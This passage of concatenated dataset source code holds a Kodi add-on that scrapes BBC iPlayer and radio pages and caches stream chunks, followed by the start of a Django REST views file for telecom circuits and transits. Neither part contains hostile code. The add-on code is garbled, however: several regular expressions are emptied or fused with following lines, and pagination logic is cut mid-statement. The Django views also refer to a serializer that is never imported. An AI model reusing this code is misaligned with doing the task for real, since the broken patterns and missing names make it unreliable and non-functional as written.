#log(name)\n split = pvrs[name].split('|')\n url = split[0]\n if len(split) > 0:\n iconimage = split[1]\n else:\n iconimage = \"\"\n if '/episodes/' in url:\n #log(url)\n cache_all(url)\n else:\n #log((url,name))\n play_episode(url,name,iconimage,\"cache\")\n\n\n@plugin.route('/cache_all/')\ndef cache_all(url):\n #log((\"CCC\",url))\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0'}\n html = get(url)\n if not html:\n return\n\n items = []\n html_items=html.split('data-ip-id=\"')\n for p in html_items:\n IPID=p.split('\"')[0]\n urls=re.compile('href=\"(.+?)\"').findall (p)\n\n episode_url = ''\n episodes_url = ''\n for u in urls:\n if u.startswith('/iplayer/episode/'):\n episode_url = 'http://www.bbc.co.uk%s' % u\n elif u.startswith('/iplayer/episodes/'):\n episodes_url = 'http://www.bbc.co.uk%s' % u\n\n name = re.compile('title=\"(.+?)\"').findall (p)[0]\n\n series = 0\n episode = None\n match = re.compile('Episode ([0-9]*)$').search (name)\n if match:\n episode = int(match.group(1))\n else:\n match = re.compile('Series ([0-9]*): ([0-9]*)\\.').search (name)\n if match:\n series = int(match.group(1))\n episode = int(match.group(2))\n else:\n match = re.compile(', ([0-9]*)\\.').search (name)\n if match:\n episode = int(match.group(1))\n group = ''\n match=re.compile('top-title\">(.+?)<').findall (p)\n if match:\n group = match[0]\n\n iconimage = get_icon_path('tv')\n match=re.compile('img src=\"(.+?)\"').findall (p)\n if match:\n iconimage = match[0]\n else:\n match=re.compile('srcset=\"(.+?)\"').findall (p)\n if match:\n iconimage = match[0]\n\n if episode:\n label = \"%s S%03dE%03d\" % (name,series,episode)\n label = re.sub('[%s]' % re.escape(':\\/?*><|'),'',label)\n #log((episode_url,label,iconimage))\n play_episode(episode_url,label,iconimage,\"cache\")\n\n\n next_page = re.compile('///')\ndef play_episode(url,name,thumbnail,action):\n if action == \"cache\":\n cached = plugin.get_storage('cached')\n if name in cached:\n return\n html = get(url)\n #log(url)\n #log(html)\n if not html:\n return\n vpid = ''\n match = re.search(r'\"vpid\":\"(.+?)\"', html, re.DOTALL)\n if match:\n vpid = match.group(1)\n '''\n match = re.search(r'mediator.bind\\((.*?), document\\.getElementById\\(\\'tviplayer\\'\\)\\);', html, re.DOTALL)\n if match:\n data = match.group(1)\n import json\n json_data = json.loads(data)\n #print json.dumps(json_data, indent=2, sort_keys=True)\n json_name = json_data['episode']['title']\n try:\n synopses = json_data['episode']['synopses']\n if 'large' in synopses:\n description = synopses['large']\n elif 'medium' in synopses:\n description = synopses['medium']\n else:\n description = synopses['small']\n except:\n description = ''\n image = json_data['episode']['images']['standard'].replace('{recipe}','832x468')\n for stream in json_data['episode']['versions']:\n if ((stream['kind'] == 'original') or\n (stream['kind'] == 'iplayer-version')):\n vpid = stream_id_st = stream['id']\n '''\n if not vpid:\n return\n\n NEW_URL = \"http://open.live.bbc.co.uk/mediaselector/5/select/version/2.0/mediaset/apple-ipad-hls/vpid/%s/proto/http?cb=%d\" % (vpid, random.randrange(10000,99999)) #NOTE magic from get_iplayer\n\n html = get(NEW_URL)\n\n # Parse the different streams and add them as new directory entries.\n match = re.compile(\n 'media.+?bitrate=\"(.+?)\".+?encoding=\"(.+?)\".+?connection.+?href=\"(.+?)\".+?supplier=\"(.+?)\".+?transferFormat=\"(.+?)\"'\n ).findall(html)\n\n URL = []\n for bitrate, encoding, url, supplier, transfer_format in 
match:\n URL.append((int(bitrate),url))\n\n if action == \"autoplay\":\n URL=max(URL)[1]\n item = {\n 'label': name,\n 'path': URL,\n 'thumbnail': thumbnail\n }\n #if subtitles and plugin.get_setting('subtitles') == 'true':\n # plugin.set_resolved_url(item,'special://profile/addon_data/plugin.audio.bbc/subtitles.srt')\n #else:\n plugin.set_resolved_url(item)\n\n elif action == \"list\":\n items = []\n for u in sorted(URL, reverse=True):\n items.append({\n 'label': \"%s [%d kbps]\" % (name, u[0]),\n 'path': u[1],\n 'thumbnail': thumbnail,\n 'is_playable': True\n })\n return items\n elif action == \"cache\":\n cached = plugin.get_storage('cached')\n if name in cached:\n return\n URL=max(URL)[1]\n BASE = re.compile('/[^/]*?$').sub('/',URL)\n #log(URL)\n html = get(URL)\n #log(html)\n if not html:\n return\n\n if \"variants\" in html:\n lines = html.splitlines()\n last = lines[-1]\n URL = BASE + last\n html = get(URL)\n #log(html)\n lines = html.splitlines()\n if not URL.startswith('http'):\n return\n html = get(URL)\n lines = html.splitlines()\n basename = '%s%s' % (plugin.get_setting('cache'), re.sub('[\\\\/:]','',name))\n #xbmcvfs.copy('special://profile/addon_data/plugin.audio.bbc/subtitles.srt',\"%s.srt\" % basename)\n f = xbmcvfs.File(\"%s.ts\" % basename,'wb')\n chunks = [x for x in lines if not x.startswith('#')]\n if plugin.get_setting('cache.progress') == 'true':\n progress = True\n else:\n progress = False\n if progress:\n d = xbmcgui.DialogProgressBG()\n d.create('BBC','%s' % name)\n total = len(chunks)\n count = 0\n else:\n xbmcgui.Dialog().notification(\"BBC Cache Started\",name)\n for chunk in chunks:\n if not chunk.startswith('http'):\n chunk = BASE+chunk\n #log(chunk)\n data = get(chunk)\n f.write(data)\n if progress:\n percent = int(100.0 * count / total)\n d.update(percent, \"BBC\", \"%s\" % name)\n count = count + 1\n f.close()\n cached[name] = datetime.datetime.now()\n if progress:\n d.close()\n else:\n xbmcgui.Dialog().notification(\"BBC Cache Finished\",name)\n\n\n\n@plugin.route('/alphabet')\ndef alphabet():\n items = []\n for letter in char_range('A', 'Z'):\n url = 'http://www.bbc.co.uk/programmes/a-z/by/%s/player' % letter\n items.append({\n 'label': letter,\n 'path': plugin.url_for('page',url=url),\n 'thumbnail':get_icon_path('lists'),\n })\n letter = \" \"\n url = 'http://www.bbc.co.uk/programmes/a-z/by/%40/player'\n items.append({\n 'label': \"0-9\",\n 'path': plugin.url_for('page',url=url),\n 'thumbnail':get_icon_path('lists'),\n })\n\n return items\n\ndef char_range(c1, c2):\n for c in xrange(ord(c1), ord(c2)+1):\n yield chr(c)\n\n@plugin.route('/letter/')\ndef letter(letter):\n url = 'http://www.bbc.co.uk/programmes/a-z/by/%s/player' % letter\n #url = 'http://www.bbc.co.uk/iplayer/a-z/%s' % letter\n html = get(url)\n\n items = []\n match=re.compile('(.+?)',re.DOTALL).findall (html)\n for url , name in match:\n url = \"http://www.bbc.co.uk/iplayer/episodes/%s\" % url\n thumbnail = get_icon_path('lists')\n context_items = []\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Add Favourite', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for(add_favourite, name=name, url=url, thumbnail=thumbnail, is_episode=False))))\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Add to PVR', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for(add_pvr, name=name, url=url, thumbnail=thumbnail, is_episode=False))))\n items.append({\n 'label': unescape(name),\n 'path': plugin.url_for('page',url=url),\n 'thumbnail':thumbnail,\n 'context_menu': context_items,\n })\n return 
items\n\n\n@plugin.route('/channel_a_z')\ndef channel_a_z():\n channel_list = [\n ('bbcone', 'bbc_one_hd', 'BBC One'),\n ('bbctwo', 'bbc_two_hd', 'BBC Two'),\n ('tv/bbcthree', 'bbc_three_hd', 'BBC Three'),\n ('bbcfour', 'bbc_four_hd', 'BBC Four'),\n ('tv/cbbc', 'cbbc_hd', 'CBBC'),\n ('tv/cbeebies', 'cbeebies_hd', 'CBeebies'),\n ('tv/bbcnews', 'bbc_news24', 'BBC News Channel'),\n ('tv/bbcparliament', 'bbc_parliament', 'BBC Parliament'),\n ('tv/bbcalba', 'bbc_alba', 'Alba'),\n ('tv/s4c', 's4cpbs', 'S4C'),\n ]\n items = []\n for id, img, name in channel_list:\n icon = 'special://home/addons/plugin.audio.bbc/resources/img/%s.png' % img\n url = \"http://www.bbc.co.uk/%s/a-z\" % id\n items.append({\n 'label' : name,\n 'thumbnail' : icon,\n 'path' : plugin.url_for('page',url=url),\n 'is_playable' : False\n })\n return items\n\n@plugin.route('/new_page/')\ndef new_page(url):\n page_url = url\n #llog((\"NNN\",url))\n just_episodes=False\n \"\"\" Generic Radio page scraper. \"\"\"\n\n if plugin.get_setting('autoplay') == 'true':\n autoplay = True\n action = \"autoplay\"\n else:\n autoplay = False\n action = \"list\"\n\n\n pDialog = xbmcgui.DialogProgressBG()\n pDialog.create(\"BBC Radio\")\n\n try:\n html = get(page_url)\n except:\n return\n #llog(\"XXX\")\n #log((\"HHH\",html))\n items = []\n total_pages = 1\n current_page = 1\n page_range = range(1)\n paginate = re.search(r'',html)\n next_page = 1\n if paginate:\n if plugin.get_setting('page') == \"true\":\n current_page_match = re.search(r'page=(\\d*)', page_url)\n if current_page_match:\n current_page = int(current_page_match.group(1))\n page_range = range(current_page, current_page+1)\n next_page_match = re.search(r'
href=\"(.+?page=)(\\d*)\"', paginate.group(0))\n if next_page_match:\n page_base_url = next_page_match.group(1)\n next_page = int(next_page_match.group(2))\n else:\n next_page = current_page\n page_range = range(current_page, current_page+1)\n else:\n pages = re.findall(r'',paginate.group(0))\n if pages:\n last = pages[-1]\n last_page = re.search(r' current_page:\n page_url = 'http://www.bbc.co.uk' + page_base_url + str(page)\n html = get(page_url)\n\n\n programme_items = html.split('class=\"programme-item ')\n for programme_item in programme_items:\n #llog(programme_item)\n\n link = re.search('href=\"(/programmes/.+?)\"',programme_item)\n if link:\n link = link.group(1)\n #llog(link)\n\n episodes = re.search('href=\"(/programmes/.+?/episodes)\"',programme_item)\n if episodes:\n episodes = episodes.group(1)\n #llog(episodes)\n\n title = re.search('class=\"programme-item-title.+?>(.+?)<',programme_item)\n if title:\n title = unescape(title.group(1))\n #llog(title)\n\n\n subtitle = re.search('class=\"programme-item-subtitle.+?>(.+?)<',programme_item)\n if subtitle:\n subtitle = unescape(subtitle.group(1))\n #llog(subtitle)\n\n image = get_icon_path('live')\n if link:\n if not link.startswith('http'):\n link = \"http://www.bbc.co.uk\"+link\n label = \"%s - %s\" % (title,subtitle)\n items.append({\n 'label': label,\n 'path': plugin.url_for('play_episode', url=link, name=label,thumbnail=image,action=action),\n 'thumbnail':image,\n 'is_playable' : autoplay,\n #'context_menu': context_items,\n })\n image = get_icon_path('folder')\n if episodes:\n if not episodes.startswith('http'):\n episodes = \"http://www.bbc.co.uk\"+episodes\n path = plugin.url_for('page', url=episodes)\n items.append({\n 'label': \"[B]%s[/B]\" % (title),\n 'path': path,\n 'thumbnail':image,\n #'is_playable' : autoplay,\n #'context_menu': context_items,\n })\n\n\n if plugin.get_setting('radio_paginate_episodes') == \"true\":\n if current_page < next_page:\n page_url = 'http://www.bbc.co.uk' + page_base_url + str(next_page)\n #AddMenuEntry(\" [COLOR ffffa500]%s >>[/COLOR]\" % translation(30320), page_url, 136, '', '', '')\n items.append({\n 'label': \">>\",\n 'path': 'http://www.bbc.co.uk' + page_base_url + str(next_page),\n 'thumbnail':\"\",\n })\n\n #BUG: this should sort by original order but it doesn't (see http://trac.kodi.tv/ticket/10252)\n #xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_UNSORTED)\n #xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_VIDEO_TITLE)\n\n pDialog.close()\n\n return items\n\n@plugin.route('/page/<url>')\ndef page(url):\n page_url = url\n #llog(url)\n just_episodes=False\n \"\"\" Generic Radio page scraper. \"\"\"\n\n pDialog = xbmcgui.DialogProgressBG()\n pDialog.create(\"BBC Radio\")\n\n html = get(page_url)\n items = []\n total_pages = 1\n current_page = 1\n page_range = range(1)\n paginate = re.search(r'',html)\n next_page = 1\n if paginate:\n if plugin.get_setting('page') == \"true\":\n current_page_match = re.search(r'page=(\\d*)', page_url)\n if current_page_match:\n current_page = int(current_page_match.group(1))\n page_range = range(current_page, current_page+1)\n next_page_match = re.search(r'href=\"(.+?page=)(\\d*)\"', paginate.group(0))
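# The pattern above splits a \"next page\" link into its base URL and page\n# number. Illustrative only; the exact BBC markup is an assumption:\n# re.search(r'href=\"(.+?page=)(\\d*)\"', 'href=\"/radio/a-z?page=3\"').groups()\n# -> ('/radio/a-z?page=', '3')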
if next_page_match:\n page_base_url = next_page_match.group(1)\n next_page = int(next_page_match.group(2))\n else:\n next_page = current_page\n page_range = range(current_page, current_page+1)\n else:\n pages = re.findall(r'',paginate.group(0))\n if pages:\n last = pages[-1]\n last_page = re.search(r' current_page:\n page_url = 'http://www.bbc.co.uk' + page_base_url + str(page)\n html = get(page_url)\n\n #llog(html)\n masthead_title = ''\n masthead_title_match = re.search(r'(.+?)', html)\n if masthead_title_match:\n masthead_title = masthead_title_match.group(1)\n #llog((\"MMM\",masthead_title))\n list_item_num = 1\n\n programmes = html.split('
    (.+?)', programme)\n if name_match:\n name = name_match.group(1)\n\n subtitle = ''\n subtitle_match = re.search(r'(.*?)(.*?property=\"name\">(.*?))?', programme)\n if subtitle_match:\n series = subtitle_match.group(1)\n episode = subtitle_match.group(3)\n if episode:\n subtitle = \"(%s, %s)\" % (series, episode)\n else:\n if series.strip():\n subtitle = \"(%s)\" % series\n\n image = ''\n image_match = re.search(r'', programme)\n if image_match:\n image = image_match.group(1)\n\n synopsis = ''\n synopsis_match = re.search(r'(.+?)', programme)\n if synopsis_match:\n synopsis = synopsis_match.group(1)\n\n station = ''\n station_match = re.search(r'
(.+?).*?', programme)\n if station_match:\n station = station_match.group(1).strip()\n\n series_title = \"[B]%s - %s[/B]\" % (station, name)\n if just_episodes:\n title = \"[B]%s[/B] - %s\" % (masthead_title, name)\n elif station:\n title = \"[B]%s[/B] - %s %s\" % (station, name, subtitle)\n else:\n title = \"[B]%s[/B] - %s\" % (masthead_title, name)\n if series_url:\n #AddMenuEntry(series_title, series_url, 131, image, synopsis, '')\n items.append({\n 'label': series_title,\n 'path': plugin.url_for('page', url=\"http://www.bbc.co.uk\"+series_url),\n 'thumbnail':image,\n })\n elif programme_id: #TODO maybe they are not always mutually exclusive\n\n url = \"http://www.bbc.co.uk/programmes/%s\" % programme_id\n #CheckAutoplay(title, url, image, ' ', '')\n if plugin.get_setting('autoplay') == 'true':\n autoplay = True\n action = \"autoplay\"\n else:\n autoplay = False\n action = \"list\"\n context_items = []\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Add Favourite', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for(add_favourite, name=title, url=url, thumbnail=image, is_episode=True))))\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Add to PVR', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for(add_pvr, name=title, url=url, thumbnail=image, is_episode=True))))\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Cache', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for('play_episode',url=url,name=title,thumbnail=image,action=\"cache\"))))\n items.append({\n 'label': title,\n 'path': plugin.url_for('play_episode', url=url, name=title,thumbnail=image,action=action),\n 'thumbnail':image,\n 'is_playable' : autoplay,\n 'context_menu': context_items,\n })\n\n percent = int(100*(page+list_item_num/len(programmes))/total_pages)\n pDialog.update(percent,name)\n\n list_item_num += 1\n\n percent = int(100*page/total_pages)\n pDialog.update(percent,\"BBC Radio\")\n\n\n if plugin.get_setting('radio_paginate_episodes') == \"true\":\n if current_page < next_page:\n page_url = 'http://www.bbc.co.uk' + page_base_url + str(next_page)\n #AddMenuEntry(\" [COLOR ffffa500]%s >>[/COLOR]\" % translation(30320), page_url, 136, '', '', '')\n items.append({\n 'label': \">>\",\n 'path': 'http://www.bbc.co.uk' + page_base_url + str(next_page),\n 'thumbnail':\"\",\n })\n\n #BUG: this should sort by original order but it doesn't (see http://trac.kodi.tv/ticket/10252)\n #xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_UNSORTED)\n #xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_VIDEO_TITLE)\n\n pDialog.close()\n\n return items\n\n@plugin.route('/add_pvr/<name>/<url>/<thumbnail>/<is_episode>')\ndef add_pvr(name,url,thumbnail,is_episode):\n pvrs = plugin.get_storage('pvrs')\n pvrs[name] = '|'.join((url,thumbnail,is_episode))\n\n@plugin.route('/remove_pvr/<name>')\ndef remove_pvr(name):\n pvrs = plugin.get_storage('pvrs')\n del pvrs[name]\n xbmc.executebuiltin('Container.Refresh')\n\n@plugin.route('/add_favourite/<name>/<url>/<thumbnail>/<is_episode>')\ndef add_favourite(name,url,thumbnail,is_episode):\n favourites = plugin.get_storage('favourites')\n favourites[name] = '|'.join((url,thumbnail,is_episode))\n\n@plugin.route('/remove_favourite/<name>')\ndef remove_favourite(name):\n favourites = plugin.get_storage('favourites')\n del favourites[name]\n xbmc.executebuiltin('Container.Refresh')\n\n@plugin.route('/remove_search/<name>')\ndef remove_search(name):\n searches = plugin.get_storage('searches')\n del searches[name]\n xbmc.executebuiltin('Container.Refresh')\n\n@plugin.route('/new_search')\ndef new_search():\n d = xbmcgui.Dialog()\n what = d.input(\"New 
Search\")\n if what:\n searches = plugin.get_storage('searches')\n searches[what] = ''\n return search(what)\n\n@plugin.route('/search/')\ndef search(what):\n if not what:\n return\n #url = 'http://www.bbc.co.uk/radio/programmes/a-z/by/%s/current' % search_entered\n url= 'http://www.bbc.co.uk/search?filter=programmes&q=%s' % what.replace(' ','%20')\n return page(url)\n\n@plugin.route('/searches')\ndef searches():\n searches = plugin.get_storage('searches')\n items = []\n\n items.append({\n 'label': 'New Search',\n 'path': plugin.url_for('new_search'),\n 'thumbnail':get_icon_path('search'),\n })\n for search in sorted(searches):\n context_items = []\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Remove Search', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for(remove_search, name=search))))\n items.append({\n 'label': search,\n 'path': plugin.url_for('search',what=search),\n 'thumbnail':get_icon_path('search'),\n 'context_menu': context_items,\n })\n return items\n\n@plugin.route('/favourites')\ndef favourites():\n global big_list_view\n big_list_view = True\n favourites = plugin.get_storage('favourites')\n items = []\n if plugin.get_setting('autoplay') == 'true':\n autoplay = True\n action = \"autoplay\"\n else:\n autoplay = False\n action = \"list\"\n for name in sorted(favourites):\n fav = favourites[name]\n url,iconimage,is_episode = fav.split('|')\n context_items = []\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Remove Favourite', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for(remove_favourite, name=name))))\n if is_episode == \"True\":\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Cache', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for('play_episode',url=url,name=name,thumbnail=iconimage,action=\"cache\"))))\n items.append({\n 'label': unescape(name),\n 'path': plugin.url_for('play_episode',url=url,name=name,thumbnail=iconimage,action=action),\n 'thumbnail':iconimage,\n 'is_playable' : autoplay,\n 'context_menu': context_items,\n })\n else:\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Cache All', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for('cache_all',url=url))))\n items.append({\n 'label': \"[COLOR %s][B]%s[/B][/COLOR]\" % (remove_formatting(plugin.get_setting('group.colour')),unescape(name)),\n 'path': plugin.url_for('page',url=url),\n 'thumbnail':iconimage,\n 'is_playable' : False,\n 'context_menu': context_items,\n })\n return items\n\n@plugin.route('/pvr_list')\ndef pvr_list():\n global big_list_view\n big_list_view = True\n pvrs = plugin.get_storage('pvrs')\n items = []\n if plugin.get_setting('autoplay') == 'true':\n autoplay = True\n action = \"autoplay\"\n else:\n autoplay = False\n action = \"list\"\n for name in sorted(pvrs):\n fav = pvrs[name]\n url,iconimage,is_episode = fav.split('|')\n context_items = []\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Remove from PVR', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for(remove_pvr, name=name))))\n if is_episode == \"True\":\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Cache', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for('play_episode',url=url,name=name,thumbnail=iconimage,action=\"cache\"))))\n items.append({\n 'label': unescape(name),\n 'path': plugin.url_for('play_episode',url=url,name=name,thumbnail=iconimage,action=action),\n 'thumbnail':iconimage,\n 'is_playable' : autoplay,\n 'context_menu': context_items,\n })\n else:\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Cache All', 'XBMC.RunPlugin(%s)' %\n 
(plugin.url_for('cache_all',url=url))))\n items.append({\n 'label': \"[COLOR %s][B]%s[/B][/COLOR]\" % (remove_formatting(plugin.get_setting('group.colour')),unescape(name)),\n 'path': plugin.url_for('page',url=url),\n 'thumbnail':iconimage,\n 'is_playable' : False,\n 'context_menu': context_items,\n })\n return items\n\n@plugin.route('/categories')\ndef categories():\n url = 'https://www.bbc.co.uk/radio/categories'\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0'}\n html = get(url)\n\n if plugin.get_setting('categories') == '0':\n order = \"atoz\"\n else:\n order = \"dateavailable\"\n\n match = re.compile(\n 'href=\"(/radio/categories/.+?)\">(.+?)
    '\n ).findall(html)\n\n categories = {}\n for url, title in set(match):\n base = url.split('/')[-1]\n if '-' not in base:\n categories[base] = title\n\n items = []\n for url, title in set(match):\n base = url.split('/')[-1]\n category = ''\n if '-' in base:\n category, name = base.split('-')\n category = categories.get(category,category)\n name = title\n label = \"%s - %s\" % (category,name)\n else:\n category = title\n name = ''\n label = category\n\n url = 'https://www.bbc.co.uk%s' % (url)\n items.append({\n 'label': unescape(label),\n 'path': plugin.url_for('new_page',url=url),\n 'thumbnail':get_icon_path('lists'),\n })\n items = sorted(items, key=lambda x: x[\"label\"].lower())\n return items\n\n@plugin.route('/live_mpd')\ndef live_mpd():\n channel_list = [\n ('bbc_one_hd', 'BBC One'),\n ('bbc_two_hd', 'BBC Two'),\n ('bbc_four_hd', 'BBC Four'),\n ('cbbc_hd', 'CBBC'),\n ('cbeebies_hd', 'CBeebies'),\n ('bbc_news24', 'BBC News Channel'),\n ('bbc_parliament', 'BBC Parliament'),\n ('bbc_alba', 'Alba'),\n ('s4cpbs', 'S4C'),\n ('bbc_one_london', 'BBC One London'),\n ('bbc_one_scotland_hd', 'BBC One Scotland'),\n ('bbc_one_northern_ireland_hd', 'BBC One Northern Ireland'),\n ('bbc_one_wales_hd', 'BBC One Wales'),\n ('bbc_two_scotland', 'BBC Two Scotland'),\n ('bbc_two_northern_ireland_digital', 'BBC Two Northern Ireland'),\n ('bbc_two_wales_digital', 'BBC Two Wales'),\n ('bbc_two_england', 'BBC Two England',),\n ('bbc_one_cambridge', 'BBC One Cambridge',),\n ('bbc_one_channel_islands', 'BBC One Channel Islands',),\n ('bbc_one_east', 'BBC One East',),\n ('bbc_one_east_midlands', 'BBC One East Midlands',),\n ('bbc_one_east_yorkshire', 'BBC One East Yorkshire',),\n ('bbc_one_north_east', 'BBC One North East',),\n ('bbc_one_north_west', 'BBC One North West',),\n ('bbc_one_oxford', 'BBC One Oxford',),\n ('bbc_one_south', 'BBC One South',),\n ('bbc_one_south_east', 'BBC One South East',),\n ('bbc_one_west', 'BBC One West',),\n ('bbc_one_west_midlands', 'BBC One West Midlands',),\n ('bbc_one_yorks', 'BBC One Yorks',),\n ]\n items = []\n for id,name in channel_list:\n icon = 'special://home/addons/plugin.audio.bbc.live.mpd/resources/media/%s.png' % id\n path = 'http://a.files.bbci.co.uk/media/live/manifesto/audio_video/simulcast/dash/uk/dash_pc/ak/%s.mpd' % id\n item = ListItem(label=name,icon=icon,path=path)\n item.set_property('inputstreamaddon', 'inputstream.adaptive')\n item.set_property('inputstream.adaptive.manifest_type', 'mpd')\n item.set_is_playable(True)\n items.append(item)\n return items\n\n@plugin.route('/')\ndef index():\n context_items = []\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'PVR Service', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for('start_pvr_service'))))\n items = [\n {\n 'label': 'Live',\n 'path': plugin.url_for('live'),\n 'thumbnail':get_icon_path('tv'),\n },\n #{\n # 'label': 'Red Button',\n # 'path': plugin.url_for('red_button'),\n # 'thumbnail':get_icon_path('red_button'),\n #},\n #{\n # 'label': 'Schedules',\n # 'path': plugin.url_for('schedules'),\n # 'thumbnail':get_icon_path('tv'),\n #},\n #{\n # 'label': 'Most Popular',\n # 'path': plugin.url_for('page',url='http://www.bbc.co.uk/radio/popular'),\n # 'thumbnail':get_icon_path('top'),\n #},\n #{\n # 'label': 'Search',\n # 'path': plugin.url_for('searches'),\n # 'thumbnail':get_icon_path('search'),\n #},\n {\n 'label': 'A-Z',\n 'path': plugin.url_for('alphabet'),\n 'thumbnail':get_icon_path('lists'),\n },\n #{\n # 'label': 'Channel A-Z',\n # 'path': plugin.url_for('channel_a_z'),\n # 
'thumbnail':get_icon_path('lists'),\n #},\n {\n 'label': 'Categories',\n 'path': plugin.url_for('categories'),\n 'thumbnail':get_icon_path('lists'),\n },\n {\n 'label': 'Favourites',\n 'path': plugin.url_for('favourites'),\n 'thumbnail':get_icon_path('favourites'),\n },\n {\n 'label': 'PVR',\n 'path': plugin.url_for('pvr_list'),\n 'thumbnail':get_icon_path('clock'),\n 'context_menu': context_items,\n },\n #{\n # 'label': 'Make Live Playlist',\n # 'path': plugin.url_for('make_playlist'),\n # 'thumbnail':get_icon_path('settings'),\n #},\n ]\n return items\n\n\nif __name__ == '__main__':\n plugin.run()\n if big_list_view == True:\n view_mode = int(plugin.get_setting('view_mode'))\n if view_mode:\n plugin.set_view_mode(view_mode)","repo_name":"primaeval/plugin.audio.bbc","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":54494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28667642925","text":"# coding: utf-8\nfrom rest_framework import status\nfrom rest_framework.views import APIView\nfrom rest_framework.generics import ListAPIView, CreateAPIView, RetrieveUpdateDestroyAPIView, get_object_or_404\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom knox.auth import TokenAuthentication\nfrom django.db.models import Q\nfrom apps.accounts.permissions import IsPervichkaOnly\nfrom apps.opu.circuits.serializers import CircuitTrassaList\nfrom apps.opu.circuits.service import create_circuit_transit\nfrom apps.opu.objects.serializers import PGListSerializer, TransitCreateSerializer, \\\n TransitDetailSerializer, BridgeListSerializer\nfrom apps.opu.circuits.models import Circuit, CircuitTransit\nfrom apps.opu.objects.models import Object, Point, Transit, Bridge\nfrom apps.opu.objects.serializers import PointList, ObjectListSerializer\nfrom apps.opu.objects.services import check_circuit_transit\n\nfrom apps.accounts.permissions import SuperUser, IngenerUser\n\n\nclass PointListTrassa(ListAPIView):\n \"\"\"List of points (IP) for creating a route\"\"\"\n permission_classes = (IsAuthenticated,)\n authentication_classes = (TokenAuthentication,)\n queryset = Point.objects.all().order_by('point').values('id', 'point', 'name')\n serializer_class = PointList\n\n\nclass SelectPointView(APIView):\n \"\"\"Select a point (IP) for filtering LPs\"\"\"\n permission_classes = (IsAuthenticated,)\n authentication_classes = (TokenAuthentication,)\n\n def get(self, request, pk):\n point = Point.objects.get(pk=pk)\n lps = Object.objects.filter(Q(point1=point) | Q(point2=point), id_parent=None)\n serializer = ObjectListSerializer(lps, many=True).data\n return Response(serializer)\n\n\nclass ObjectList(APIView):\n \"\"\"List of PG, VG, etc.\"\"\"\n permission_classes = (IsAuthenticated,)\n authentication_classes = (TokenAuthentication,)\n\n def get(self, request, pk):\n obj = Object.objects.get(pk=pk)\n childs = obj.parents.all()\n serializer = ObjectListSerializer(childs, many=True).data\n return Response(serializer)\n\n\n'''Route creation for circuits'''\nclass PGCircuitListView(APIView):\n \"\"\"Select a PG for creating a circuits route\"\"\"\n authentication_classes = (TokenAuthentication,)\n permission_classes = (IsAuthenticated, IsPervichkaOnly | SuperUser, IngenerUser | SuperUser)\n\n def get(self, request, pk):\n obj = Object.objects.get(pk=pk)\n childs = obj.parents.all()\n pg = []\n while childs:\n newchilds = []\n for c in childs:\n if 
c.type_of_trakt.name == 'ПГ':\n pg.append(c)\n newchilds += c.parents.all()\n childs = newchilds\n serializer = PGListSerializer(pg, many=True).data\n return Response(serializer)\n\n\nclass SelectCircuitView(APIView):\n \"\"\"Select a circuit for filtering circuits\"\"\"\n permission_classes = (IsAuthenticated,)\n authentication_classes = (TokenAuthentication,)\n\n def get(self, request, pk):\n obj = Object.objects.get(pk=pk)\n circuits = Circuit.objects.filter(object=obj)\n serializer = CircuitTrassaList(circuits, many=True).data\n return Response(serializer)\n\n\nclass CircuitListTrassa(ListAPIView):\n \"\"\"List of circuits for creating a route\"\"\"\n permission_classes = (IsAuthenticated,)\n authentication_classes = (TokenAuthentication,)\n queryset = Circuit.objects.all().order_by('num_circuit')\n serializer_class = CircuitList\n\n\nclass TransitCreateAPIView(CreateAPIView):\n queryset = Transit.objects.all()\n serializer_class = TransitCreateSerializer\n permission_classes = (IsAuthenticated, IsPervichkaOnly | SuperUser, IngenerUser | SuperUser)\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n new_trassa = set(Object.objects.get(id=pk) for pk in request.data[\"trassa\"])\n if self.request.data[\"create_circuit_transit\"]:\n if not check_circuit_transit(new_trassa):\n return Response({\"detail\": \"Transit cannot be set up: a terminal object of the route already takes part in a transit\"},\n status=status.HTTP_403_FORBIDDEN)\n for obj in new_trassa:\n for bridge in obj.bridges.filter(transit__create_circuit_transit=True):\n bridge.transit.create_circuit_transit = False\n bridge.transit.save()\n\n 